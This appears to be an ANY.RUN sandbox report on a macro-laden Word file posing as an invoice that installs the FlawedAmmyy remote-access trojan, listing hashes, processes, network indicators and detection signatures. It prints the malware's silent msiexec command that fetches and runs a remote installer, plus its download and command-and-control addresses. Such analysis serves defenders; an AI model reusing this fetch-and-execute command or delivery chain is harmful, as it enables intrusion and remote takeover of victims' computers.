analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

송장_00190821.doc

Full analysis: https://app.any.run/tasks/d1660e35-4330-46e3-88dc-cd0667be72dd
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Analysis date: February 19, 2019, 01:06:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
exe-to-msi
rat
flawedammyy
ammyy
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 1, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 20:07:00 2019, Last Saved Time/Date: Mon Feb 18 20:07:00 2019, Number of Pages: 1, Number of Words: 23, Number of Characters: 137, Security: 0
MD5:

93E5AF41B2994E60FE1655994DCC1FC3

SHA1:

0DF9F97D57786EBDC54C95218DE8BB762E32ABBA

SHA256:

32318477E1C624E585C61546FAE2059D2FF8F3732A988E890665C2D81B3651CC

SSDEEP:

768:5pMLELemEgZnQgW5tmhdMgNMVkefr0VTEJ6eSX:5LLemXZQgW5IYgNlPoJ6vX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2952)
    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2952)
    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 2356)
      • wsus.exe (PID: 3344)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3620)
    • Loads the Task Scheduler DLL interface

      • MSI7998.tmp (PID: 3732)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3620)
    • Loads the Task Scheduler COM API

      • MSI7998.tmp (PID: 3732)
    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 2356)
    • Connects to CnC server

      • wsus.exe (PID: 2356)
    • Changes the autorun value in the registry

      • MSI7998.tmp (PID: 3732)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3620)
      • MSI7998.tmp (PID: 3732)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3620)
    • Creates files in the program directory

      • MSI7998.tmp (PID: 3732)
    • Starts CMD.EXE for commands execution

      • MSI7998.tmp (PID: 3732)
    • Creates files in the Windows directory

      • MSI7998.tmp (PID: 3732)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3620)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3620)
    • Application was dropped or rewritten from another process

      • MSI7998.tmp (PID: 3732)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: 1
Subject: -
Author: 1
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: 1
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:18 20:07:00
ModifyDate: 2019:02:18 20:07:00
Pages: 1
Words: 23
Characters: 137
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 159
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: 1
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msi7998.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs cmd.exe no specs wsus.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\송장_00190821.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2292"C:\Windows\System32\msiexec.exe" back=001 error=exit /i http://185.17.120.235/select /q OnLoad="c:\windows\calc.exe" Aciqy=¶µ±VIks1C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3620C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3732"C:\Windows\Installer\MSI7998.tmp"C:\Windows\Installer\MSI7998.tmp
msiexec.exe
User:
admin
Company:
IBM Controler' System Security Control
Integrity Level:
MEDIUM
Description:
IBM Controler' System Security Control
Exit code:
0
Version:
2.8.17228.1
2356"C:\ProgramData\Microsofts Help\wsus.exe"C:\ProgramData\Microsofts Help\wsus.exe
MSI7998.tmp
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Version:
1.18.2.51920
3544"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI7998.tmp >> NULC:\Windows\system32\cmd.exeMSI7998.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3272"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI7998.tmp >> NULC:\Windows\system32\cmd.exeMSI7998.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3344"C:\ProgramData\Microsofts Help\wsus.exe" C:\ProgramData\Microsofts Help\wsus.exetaskeng.exe
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Exit code:
0
Version:
1.18.2.51920
Total events
1 266
Read events
824
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A72.tmp.cvr
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF1D2EF77149386531.TMP
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF01A46989082D8E6A.TMP
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC991148481C89CD8.TMP
MD5:
SHA256:
3620msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF22CCE735B614C85D.TMP
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:F7D34DC421B610B2669C88903C6D95EB
SHA256:F1FC05C3CB975D8BAD1547C4C984D4DBB04A01CDDD1DC1F5D720CB317455B747
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:937C7F34EF666E30C118260C7F331AC8
SHA256:5C0F5D032F0C9B6883A60E30E456753168AE38564338DDD40739707B0FFE3C77
3620msiexec.exeC:\Config.Msi\247794.rbs
MD5:
SHA256:
3620msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFE2D4724D14BA4D31.TMP
MD5:
SHA256:
3732MSI7998.tmpC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\dat1[1].omgbinary
MD5:DA80F64698FDCBE7C3284DF94DCCC6F3
SHA256:1FA3B63B9FD44F2C93B4D513BA33839F56094A2D7886C8E151BB9F11132CF5CD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3620
msiexec.exe
GET
200
185.17.120.235:80
http://185.17.120.235/select
RU
executable
168 Kb
suspicious
3732
MSI7998.tmp
GET
200
185.17.120.235:80
http://185.17.120.235/dat1.omg
RU
binary
657 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3620
msiexec.exe
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
2356
wsus.exe
185.99.133.2:80
Zappie Host LLC
NZ
malicious
3732
MSI7998.tmp
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3620
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3620
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2356
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
2356
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
2356
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
2356
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSI7998.tmp
C:\ProgramData\Microsofts Help\template_aae330.DATAHASH
MSI7998.tmp
--End Dowload--